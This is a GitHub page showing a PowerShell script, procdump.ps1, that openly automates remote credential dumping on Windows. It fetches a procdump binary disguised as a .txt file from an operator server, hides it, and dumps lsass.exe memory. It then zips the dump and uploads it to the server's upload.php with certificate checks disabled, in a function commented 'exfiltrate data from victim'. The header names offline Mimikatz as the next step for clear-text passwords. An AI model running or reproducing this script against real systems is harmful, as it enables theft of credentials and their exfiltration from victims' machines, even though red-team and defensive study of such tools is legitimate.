-
Notifications
You must be signed in to change notification settings - Fork 7
/
procdump.ps1
72 lines (68 loc) · 2.92 KB
/
procdump.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
<#
RPROCDUMP - Remote process dumping automation.
Use it to dump remotely all windows credentials and extract clear text with Mimikatz offline
Help:
Edit prameters in procdump.ps1 and run Rprocdump.ps1 with same parameters:
example:
RProcdump -server http://127.0.0.1 -login administrator -pass password123
Author: @ThebenyGreen
- EyesOpenSecurity
#>
[string] $server = "http://127.0.0.1"
[string] $process="lsass.exe"
[string] $dumpfile = hostname
[string] $pshversion = $PSVersionTable.psversion.Major
Function zip{
if ($pshversion -lt 3) {
Add-Type -assembly "system.io.compression.filesystem"
[io.compression.zipfile]::CreateFromDirectory("$env:userprofile\AppData\dump", "$env:userprofile\AppData\$dumpfile.zip")
}
else {
Compress-Archive -path "$env:userprofile\AppData\dump" -destinationpath "$env:userprofile\AppData\$dumpfile.zip"
Start-sleep -Seconds 5
}
}
Function Exfiltrate{ # exfiltrate data from victim
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={true};
$http = new-object System.Net.WebClient;
[string] $url="$server/upload.php";
zip
$Path = "$env:userprofile\AppData\$dumpfile.zip"
Start-sleep -Seconds 5
$http.UploadFile($url,$Path);
}
Function ProccessDumpCommand { # Download and execute Procdump. Dump hash from privileged process. You have to use offline mimikatz to extract password in clear text
if($env:PROCESSOR_ARCHITECTURE -eq "x86"){
$downloadURL = "$server/proc32.txt"
[string] $FileOnDisk = "$env:userprofile\AppData\proc32.txt"
if ($downloadURL.Substring(0,5) -ceq "https") {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
}
(New-Object System.Net.WebClient).AllowWriteStreamBuffering = $false
(New-Object System.Net.WebClient).DownloadFile($downloadURL,$FileOnDisk)
rename-item $FileOnDisk -NewName proc.exe
Write-Host "ProcdessDump 32..." -ForegroundColor DarkGreen;
attrib +h "$env:userprofile\AppData\proc.exe"
}
Else{
$downloadURL = "$server/proc64.txt"
[string] $FileOnDisk = "$env:userprofile\AppData\proc64.txt"
if ($downloadURL.Substring(0,5) -ceq "https") {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }
}
(New-Object System.Net.WebClient).DownloadFile($downloadURL,$FileOnDisk)
rename-item $FileOnDisk -NewName proc.exe
Write-Host "ProcessDump 64..." -ForegroundColor DarkGreen
attrib +h "$env:userprofile\AppData\proc.exe"
}
$exists = "$env:userprofile\AppData\dump"
if (Test-Path $exists){ } else {New-Item -Path "$env:userprofile\AppData" -Name "dump" -ItemType "directory" }
$cmd = "$env:userprofile\AppData\proc.exe -accepteula -ma $process $env:userprofile\AppData\dump\$dumpfile.dmp"
[string] $CmdPath = "$env:windir\System32\cmd.exe"
[string] $CmdString = "$CmdPath" + " /C " + "$cmd"
Invoke-Expression $CmdString
Start-Sleep -Seconds 60
Exfiltrate
}
ProccessDumpCommand
#Exfiltrate